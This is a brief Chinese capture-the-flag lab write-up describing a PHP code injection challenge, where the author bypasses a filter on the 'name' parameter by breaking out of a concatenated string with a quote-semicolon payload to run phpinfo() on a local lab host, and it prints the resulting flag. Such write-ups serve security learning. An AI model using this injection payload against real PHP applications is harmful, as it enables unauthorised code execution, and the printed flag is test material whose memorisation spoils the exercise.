1.开启靶场
简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。
通过传入name参数的值就可以来进行代码注入了。
2.随便试一个值
http://192.168.0.20:32769/?name=phpinfo()
果然没有那么简单,被过滤了。
3.查看源码
我不太懂php的代码,查阅了一下,可以通过截断的方式来进行绕过
";phpinfo();"\ #通过;来把拼接的字符串截断就可以绕过了
http://192.168.0.20:32769/?name=%22;phpinfo();%22\
拿到flag
flag{39a23b19e7df2581be80091b484687bc}